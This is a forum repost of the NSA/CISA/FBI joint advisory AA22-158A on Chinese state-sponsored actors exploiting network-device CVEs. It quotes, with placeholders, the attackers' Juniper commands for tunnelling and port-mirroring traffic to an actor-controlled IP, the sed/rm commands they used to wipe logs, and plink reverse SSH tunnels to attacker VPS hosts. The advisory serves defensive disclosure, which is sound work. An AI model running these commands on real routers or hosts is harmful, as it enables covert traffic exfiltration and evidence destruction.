US-CERT- AA22-158A: People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

Started by Netwörkheäd, June 08, 2022, 12:11:47 PM

Previous topic - Next topic
Print
Go Down Pages1
User actions

Netwörkheäd

June 08, 2022, 12:11:47 PM
AA22-158A: People's Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices

[html]Original release date: June 7, 2022 | Last revised: June 8, 2022

Summary

Best Practices

• Apply patches as soon as possible

• Disable unnecessary ports and protocols

• Replace end-of-life infrastructure

• Implement a centralized patch management system



This joint Cybersecurity Advisory describes the ways in which People's Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.



This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).



Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.



NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.



For more information on PRC state-sponsored malicious cyber activity, see CISA's https://www.cisa.gov/uscert/china">China Cyber Threat Overview and Advisories webpage.



https://media.defense.gov/2022/Jun/07/2003013376/-1/-1/0/CSA_PRC_SPONSORED_CYBER_ACTORS_EXPLOIT_NETWORK_PROVIDERS_DEVICES_TLPWHITE.PDF">Click here for PDF.



Common vulnerabilities exploited by People's Republic of China state-sponsored cyber actors



PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.



Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [https://attack.mitre.org/techniques/T1133/">T1133]  or public facing applications [https://attack.mitre.org/techniques/T1190/">T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems. 



PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.



These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders' accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.



NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.



 



Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors




   
      
         
      
   
   
      
         
         
         
      
      
         
         
      
      
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
         
      
      
         
         
      
      
         
         
         
      
      
         
         
      
      
         
         
      
      
         
         
      
      
         
         
         
      
   
Vendor                                       CVE                                  Vulnerability Type
CiscoCVE-2018-0171Remote Code Execution
CVE-2019-15271RCE
CVE-2019-1652RCE
CitrixCVE-2019-19781RCE
DrayTekCVE-2020-8515RCE
D-LinkCVE-2019-16920RCE
FortinetCVE-2018-13382Authentication Bypass
MikroTikCVE-2018-14847Authentication Bypass
NetgearCVE-2017-6862RCE
PulseCVE-2019-11510Authentication Bypass
CVE-2021-22893RCE
QNAPCVE-2019-7192Privilege Elevation
CVE-2019-7193Remote Inject
CVE-2019-7194XML Routing Detour Attack
CVE-2019-7195XML Routing Detour Attack
ZyxelCVE-2020-29583Authentication Bypass


Telecommunications and network service provider targeting



PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [https://attack.mitre.org/techniques/T1595/002/">T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.



Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [https://attack.mitre.org/techniques/T1078/">T1078] and utilized SQL commands to dump the credentials [https://attack.mitre.org/techniques/T1555/">T1555], which contained both cleartext and hashed passwords for user and administrative accounts. 



Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [https://attack.mitre.org/techniques/T1119/">T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor's infrastructure [https://attack.mitre.org/tactics/TA0010/">TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.



Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [https://attack.mitre.org/techniques/T1599/">T1599], capture [https://attack.mitre.org/techniques/T1020/001/">T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure. 



While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:



set chassis fpc <slot number> pic <user defined value> tunnel-services bandwidth <user defined value>

set chassis network-services all-ethernet

set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>

set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>

 


After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.



set interfaces <interface-id> unit <unit number> family inet address <local network IP address subnet>

set routing-options static route <local network IP address> next-hop <actor controlled IP address>

 


PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure. 



set firewall family inet filter <filter name> term <filter variable> then port-mirror

set forwarding-options port-mirroring input rate 1

set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>

set forwarding-options port-mirroring family inet output no-filter-check

set interfaces <interface-id> unit <unit number> family inet filter input <filter name>

set interfaces <interface-id> unit <unit number> family inet filter output <filter name>

 


Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.



sed -i -e '/<REGEX>/d' <log filepath 1>

sed -i -e '/<REGEX>/d' <log filepath 2>

sed -i -e '/<REGEX>/d' <log filepath 3>

rm -f <log filepath 4>

rm -f <log filepath 5>

rm -f <log filepath 6>

 


PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [https://attack.mitre.org/techniques/T1572/">T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [https://attack.mitre.org/techniques/T1016/001/">T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.



plink.exe –N –R <local port>:<host 1>:<remote port> -pw <user defined password> -batch root@<VPS1> -P <remote SSH port>

plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>

 

Mitigations

NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:





Resources



Refer to https://us-cert.cisa.gov/china">us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts">https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance">https://www.nsa.gov/cybersecurity-guidance for previous reporting on People's Republic of China state-sponsored malicious cyber activity.



U.S. government and critical infrastructure organizations, should consider signing up for CISA's https://www.cisa.gov/cyber-hygiene-services">cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.



U.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center's DIB Cybersecurity Service Offerings, including https://www.nsa.gov/About/Cybersecurity-Collaboration-Center/PDNS/">Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email http://www.fbi.gov/contact-us/field">dib_defense@cyber.nsa.gov.



Additional References



Let's not argue. Let's network!
Print
Go Up Pages1
User actions